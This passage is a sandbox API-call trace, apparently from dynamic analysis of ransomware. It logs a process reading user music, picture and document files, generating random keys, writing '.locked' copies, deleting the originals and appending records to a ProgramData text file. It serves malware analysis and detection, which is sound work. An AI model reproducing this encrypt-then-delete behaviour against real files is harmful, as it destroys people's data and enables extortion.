"c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\iciyvo_b9i-.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0309.412] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0309.412] SetEvent (hEvent=0x12c) returned 1 [0309.412] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0309.413] SetEvent (hEvent=0x198) returned 1 [0309.413] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0309.416] SetEvent (hEvent=0x20c) returned 1 [0309.416] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0309.428] SetEvent (hEvent=0x1e8) returned 1 [0309.428] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0309.496] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0309.513] SetEvent (hEvent=0x104) returned 1 [0309.513] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0309.712] SetEvent (hEvent=0x220) returned 1 [0309.712] WriteFile (in: hFile=0x224, lpBuffer=0x13708000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dfe78, lpOverlapped=0x0 | out: lpBuffer=0x13708000*, lpNumberOfBytesWritten=0x125dfe78*=0xfa000, lpOverlapped=0x0) returned 1 [0309.735] CloseHandle (hObject=0x224) returned 1 [0309.759] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\rABuPsLDVO2opjc 4TTO.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\rabupsldvo2opjc 4tto.pptx")) returned 1 [0309.887] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0310.117] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0310.162] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0310.166] SetEvent (hEvent=0x1ac) returned 1 [0310.166] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0310.380] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\92 o.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\92 o.mp3")) returned 1 [0310.557] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0310.607] SetEvent (hEvent=0x1f0) returned 1 [0310.608] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0310.626] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\GtPsnmjRu_gpfrBo.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\gtpsnmjru_gpfrbo.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0310.626] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12665d9c | out: lpMode=0x12665d9c) returned 0 [0310.627] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\GtPsnmjRu_gpfrBo.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\gtpsnmjru_gpfrbo.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0310.769] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0310.854] SetEvent (hEvent=0x1e8) returned 1 [0310.854] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x12665d9c | out: lpMode=0x12665d9c) returned 0 [0310.854] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0310.951] SetEvent (hEvent=0x12c) returned 1 [0310.951] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0310.958] SetEvent (hEvent=0x198) returned 1 [0310.958] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0311.102] SetEvent (hEvent=0x220) returned 1 [0311.102] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0311.432] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e0e0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e5a24, lpReserved=0x0 | out: lpBuffer=0x1263e0e0*, lpNumberOfCharsWritten=0x125e5a24*=0xc) returned 1 [0311.465] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV\\J_R4xdyvB0.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\w158lxmeu7fv\\j_r4xdyvb0.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0311.465] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0311.465] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\w158lXmEu7fV\\J_R4xdyvB0.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\w158lxmeu7fv\\j_r4xdyvb0.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0311.473] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0311.683] SetEvent (hEvent=0x1b8) returned 1 [0311.683] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0311.683] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.409] SetEvent (hEvent=0x1e8) returned 1 [0312.409] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.425] SetEvent (hEvent=0x1dc) returned 1 [0312.425] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.427] SetEvent (hEvent=0x1f0) returned 1 [0312.427] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.441] SetEvent (hEvent=0x1e8) returned 1 [0312.441] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.483] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0312.486] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0312.486] SetEvent (hEvent=0x150) returned 1 [0312.486] SetEvent (hEvent=0x1ac) returned 1 [0312.486] SetEvent (hEvent=0x1dc) returned 1 [0312.486] SetEvent (hEvent=0x134) returned 1 [0312.487] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0312.492] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.492] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0312.494] SetEvent (hEvent=0x214) returned 1 [0312.494] SetEvent (hEvent=0x198) returned 1 [0312.494] SetEvent (hEvent=0x134) returned 1 [0312.494] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.497] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0312.497] SetEvent (hEvent=0x150) returned 1 [0312.497] SetEvent (hEvent=0x198) returned 1 [0312.497] SetEvent (hEvent=0x134) returned 1 [0312.497] SetEvent (hEvent=0x214) returned 1 [0312.538] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0312.541] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.541] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0312.541] SetEvent (hEvent=0x134) returned 1 [0312.541] SetEvent (hEvent=0x214) returned 1 [0312.541] SetEvent (hEvent=0x198) returned 1 [0312.542] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0312.547] SetEvent (hEvent=0x12c) returned 1 [0312.547] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.693] SetEvent (hEvent=0x1e8) returned 1 [0312.693] WriteFile (in: hFile=0x230, lpBuffer=0x14354000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1235fe78, lpOverlapped=0x0 | out: lpBuffer=0x14354000*, lpNumberOfBytesWritten=0x1235fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0312.713] CloseHandle (hObject=0x230) returned 1 [0312.713] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\pqkT0R1dikE\\6PknB4UT.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\pqkt0r1dike\\6pknb4ut.wav")) returned 1 [0312.720] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.854] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.860] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.921] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0312.924] SetEvent (hEvent=0x1f0) returned 1 [0312.924] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0313.157] SetEvent (hEvent=0x22c) returned 1 [0313.157] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0313.164] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\6b9NjMSdcI.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\6b9njmsdci.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0313.164] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x124a0d9c | out: lpMode=0x124a0d9c) returned 0 [0313.164] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\6b9NjMSdcI.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\6b9njmsdci.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0313.165] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x124a0d9c | out: lpMode=0x124a0d9c) returned 0 [0313.165] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0313.165] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766080 | out: pbBuffer=0x12766080) returned 1 [0313.165] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702581 | out: pbBuffer=0x12702581) returned 1 [0313.165] WriteFile (in: hFile=0x1bc, lpBuffer=0x12704000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x12704000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0313.168] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0313.170] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0313.170] SetEvent (hEvent=0x150) returned 1 [0313.170] SetEvent (hEvent=0x220) returned 1 [0313.170] SetEvent (hEvent=0x22c) returned 1 [0313.170] ReadFile (in: hFile=0x218, lpBuffer=0x13912000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesRead=0x1239fd68*=0x22f5, lpOverlapped=0x0) returned 1 [0313.172] WriteFile (in: hFile=0x1bc, lpBuffer=0x13912000*, nNumberOfBytesToWrite=0x22f5, lpNumberOfBytesWritten=0x1239fd74, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesWritten=0x1239fd74*=0x22f5, lpOverlapped=0x0) returned 1 [0313.175] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0313.450] ReadFile (in: hFile=0x218, lpBuffer=0x13912000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0313.453] CloseHandle (hObject=0x1bc) returned 1 [0313.453] CloseHandle (hObject=0x218) returned 1 [0313.453] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0313.454] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1239fe94 | out: lpMode=0x1239fe94) returned 0 [0313.454] WriteFile (in: hFile=0x218, lpBuffer=0x12714200*, nNumberOfBytesToWrite=0x75, lpNumberOfBytesWritten=0x1239fe64, lpOverlapped=0x0 | out: lpBuffer=0x12714200*, lpNumberOfBytesWritten=0x1239fe64*=0x75, lpOverlapped=0x0) returned 1 [0313.454] CloseHandle (hObject=0x218) returned 1 [0313.454] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\6b9NjMSdcI.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\6b9njmsdci.png")) returned 1 [0313.501] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0313.528] SetEvent (hEvent=0x22c) returned 1 [0313.528] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0313.529] SetEvent (hEvent=0x184) returned 1 [0313.529] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0313.534] SetEvent (hEvent=0x1b8) returned 1 [0313.534] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0313.652] SetEvent (hEvent=0x20c) returned 1 [0313.653] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.100] SetEvent (hEvent=0x12c) returned 1 [0314.100] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.113] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.116] SetEvent (hEvent=0x214) returned 1 [0314.116] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.379] SetEvent (hEvent=0x20c) returned 1 [0314.379] SetEvent (hEvent=0x214) returned 1 [0314.379] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.385] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.538] SetEvent (hEvent=0x1b8) returned 1 [0314.538] SetEvent (hEvent=0x22c) returned 1 [0314.538] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.544] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.635] SetEvent (hEvent=0x1dc) returned 1 [0314.635] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0314.673] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0314.684] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.684] SetEvent (hEvent=0x12c) returned 1 [0314.684] SetEvent (hEvent=0x214) returned 1 [0314.684] SetEvent (hEvent=0x220) returned 1 [0314.684] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.685] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0314.686] SetEvent (hEvent=0x150) returned 1 [0314.686] SetEvent (hEvent=0x220) returned 1 [0314.686] SetEvent (hEvent=0x214) returned 1 [0314.686] SetEvent (hEvent=0x190) returned 1 [0314.686] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.771] SetEvent (hEvent=0x184) returned 1 [0314.771] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.815] SetEvent (hEvent=0x190) returned 1 [0314.815] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0314.826] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.826] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0314.828] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.828] SetEvent (hEvent=0x1e8) returned 1 [0314.828] SetEvent (hEvent=0x22c) returned 1 [0314.828] SetEvent (hEvent=0x12c) returned 1 [0314.828] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0314.829] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0314.829] SetEvent (hEvent=0x150) returned 1 [0314.829] SetEvent (hEvent=0x22c) returned 1 [0314.829] SetEvent (hEvent=0x12c) returned 1 [0314.829] SetEvent (hEvent=0x1e8) returned 1 [0314.829] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265ba24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x1265ba24*=0xc) returned 1 [0314.830] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\NrMhV7-QFwSdl541.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\nrmhv7-qfwsdl541.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0314.831] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0314.831] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\NrMhV7-QFwSdl541.jpg.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\nrmhv7-qfwsdl541.jpg.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0314.832] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0314.832] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0314.832] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766040 | out: pbBuffer=0x12766040) returned 1 [0314.832] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0314.832] WriteFile (in: hFile=0x208, lpBuffer=0x12719000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265bd78, lpOverlapped=0x0 | out: lpBuffer=0x12719000*, lpNumberOfBytesWritten=0x1265bd78*=0x80, lpOverlapped=0x0) returned 1 [0314.835] ReadFile (in: hFile=0x1c0, lpBuffer=0x17a20000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x17a20000*, lpNumberOfBytesRead=0x1265bd68*=0xbb51, lpOverlapped=0x0) returned 1 [0314.836] WriteFile (in: hFile=0x208, lpBuffer=0x17a20000*, nNumberOfBytesToWrite=0xbb51, lpNumberOfBytesWritten=0x1265bd74, lpOverlapped=0x0 | out: lpBuffer=0x17a20000*, lpNumberOfBytesWritten=0x1265bd74*=0xbb51, lpOverlapped=0x0) returned 1 [0314.843] ReadFile (in: hFile=0x1c0, lpBuffer=0x17a20000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x17a20000*, lpNumberOfBytesRead=0x1265bd68*=0x0, lpOverlapped=0x0) returned 1 [0314.843] CloseHandle (hObject=0x208) returned 1 [0314.843] CloseHandle (hObject=0x1c0) returned 1 [0314.843] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0314.843] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1265be94 | out: lpMode=0x1265be94) returned 0 [0314.843] WriteFile (in: hFile=0x1c0, lpBuffer=0x126ae240*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x1265be64, lpOverlapped=0x0 | out: lpBuffer=0x126ae240*, lpNumberOfBytesWritten=0x1265be64*=0x5c, lpOverlapped=0x0) returned 1 [0314.844] CloseHandle (hObject=0x1c0) returned 1 [0314.844] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\j5yJ\\NrMhV7-QFwSdl541.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\j5yj\\nrmhv7-qfwsdl541.jpg")) returned 1 [0314.943] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.016] SetEvent (hEvent=0x1e8) returned 1 [0315.016] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.050] SetEvent (hEvent=0x1dc) returned 1 [0315.050] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.123] SetEvent (hEvent=0x184) returned 1 [0315.123] SetEvent (hEvent=0x214) returned 1 [0315.123] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.139] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.166] SetEvent (hEvent=0x184) returned 1 [0315.167] SetEvent (hEvent=0x1e8) returned 1 [0315.167] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.315] SetEvent (hEvent=0x1b8) returned 1 [0315.315] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.346] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0315.349] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0315.349] SetEvent (hEvent=0x20c) returned 1 [0315.349] SetEvent (hEvent=0x12c) returned 1 [0315.349] SetEvent (hEvent=0x134) returned 1 [0315.349] ReadFile (in: hFile=0x1c8, lpBuffer=0x142d6000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x142d6000*, lpNumberOfBytesRead=0x1265dd68*=0xb965, lpOverlapped=0x0) returned 1 [0315.351] WriteFile (in: hFile=0x230, lpBuffer=0x142d6000*, nNumberOfBytesToWrite=0xb965, lpNumberOfBytesWritten=0x1265dd74, lpOverlapped=0x0 | out: lpBuffer=0x142d6000*, lpNumberOfBytesWritten=0x1265dd74*=0xb965, lpOverlapped=0x0) returned 1 [0315.362] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.406] SetEvent (hEvent=0x1f0) returned 1 [0315.406] ReadFile (in: hFile=0x1c8, lpBuffer=0x142d6000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x142d6000*, lpNumberOfBytesRead=0x1265dd68*=0x0, lpOverlapped=0x0) returned 1 [0315.407] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.429] SetEvent (hEvent=0x1e8) returned 1 [0315.429] CloseHandle (hObject=0x230) returned 1 [0315.429] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.476] SetEvent (hEvent=0x150) returned 1 [0315.477] SetEvent (hEvent=0x214) returned 1 [0315.477] CloseHandle (hObject=0x1c8) returned 1 [0315.477] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0315.604] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0315.604] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1265de94 | out: lpMode=0x1265de94) returned 0 [0315.604] WriteFile (in: hFile=0x1c0, lpBuffer=0x126e0230*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x1265de64, lpOverlapped=0x0 | out: lpBuffer=0x126e0230*, lpNumberOfBytesWritten=0x1265de64*=0x70, 